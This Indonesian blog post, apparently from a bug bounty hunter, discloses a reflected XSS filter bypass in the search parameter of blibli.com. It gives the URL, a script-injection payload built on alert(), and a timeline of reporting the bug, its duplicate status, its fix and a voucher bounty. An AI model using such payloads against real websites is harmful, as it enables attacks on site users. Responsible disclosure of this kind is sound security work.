Sunday, October 21, 2018

[ BUG ] Blibli.com | XSS filter di search



Berikut POC XSS bypass filter yang saya temukan di blibli.com 


URL : 
https://www.blibli.com/jual/test?s=iphone

Celah exploit terdapat pada parameter "s", sedangkan payload untuk  adalah sebagai berikut :

PAYLOAD :
lol<script>alert("XSS")</script>">

POC : 



Untuk Timeline nya sebagai berikut :
  • 19 - 02 - 2018 : Kirim Report ke team blibli.
  • 13 - 03 - 2018 : Konfirmasi kembali ke team blibli karena tidak ada respon dan bug ternyata  telah diperbaiki.
  • 13 - 03 - 2018 : Pihak team blibli mengkonfirmasi bahwa bug tersebut berstatus duplicate, dan telah di temukan oleh tim internal dari blibli.
  • 03 - 09 - 2018 : Berhasil bypass filter dan mengirimkan report kembali ke team blibli. 
  • 12 - 09 - 2018 : konfirmasi ulang status bug
  • 13 - 09 - 2018 : konfirmasi ulang status bug, karena setelah di cek bug tersebut sudah diperbaiki.
  • 19 - 09 - 2018 : Info dari team blibli akan memberikan bounty atas dasar penemuan ulang.
  • 22 - 10 - 2018   Info dari team blibli akan memberikan bounty berupa voucher yang akan diberikan dalam waktu 1 minggu

nb : Untuk tulisan yang detail mengenai bypass xss di blibli akan saya tulis di blog selanjutnya, karena sewaktu tulisan ini terpublish, bug yang lain belum diperbaiki



No comments:

Post a Comment